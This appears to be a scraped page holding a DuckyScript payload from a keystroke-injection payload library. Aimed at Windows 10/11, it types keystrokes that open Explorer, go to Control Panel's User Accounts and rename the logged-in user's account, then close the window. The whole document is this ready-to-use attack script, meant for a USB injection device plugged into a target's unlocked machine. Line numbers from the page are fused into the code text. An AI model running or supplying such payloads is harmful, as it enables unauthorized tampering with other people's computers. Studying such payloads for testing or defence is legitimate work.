Path: blob/master/payloads/library/execution/Change_Windows_User_Name/payload.txt
3018 views
REM #############################################1REM # |2REM # Title : Change Windows User Name |3REM # Author : Aleff |4REM # Version : 1.0 |5REM # Category : Execution |6REM # Target : Windows 10/11 |7REM # |8REM #############################################910REM Requirements:11REM - Nothing1213REM Note:14REM - Payload tested on Windows 11 Eng1516REM Set the new name that you want to set17DEFINE NEW_NAME example1819REM Open Windows research20DELAY 200021GUI22DELAY 10002324REM Search and opern explorer app25STRING explorer26ENTER27DELAY 10002829REM Goto search bar and open User Accounts settings30TAB31DELAY 50032TAB33DELAY 50034TAB35DELAY 50036ENTER37DELAY 50038STRING Control Panel\All Control Panel Items\User Accounts39ENTER40DELAY 15004142REM Goto "Change you account name"43TAB44DELAY 50045ENTER46DELAY 5004748STRING NEW_NAME49DELAY 50050TAB51DELAY 50052ENTER53DELAY 100054ALT F4555657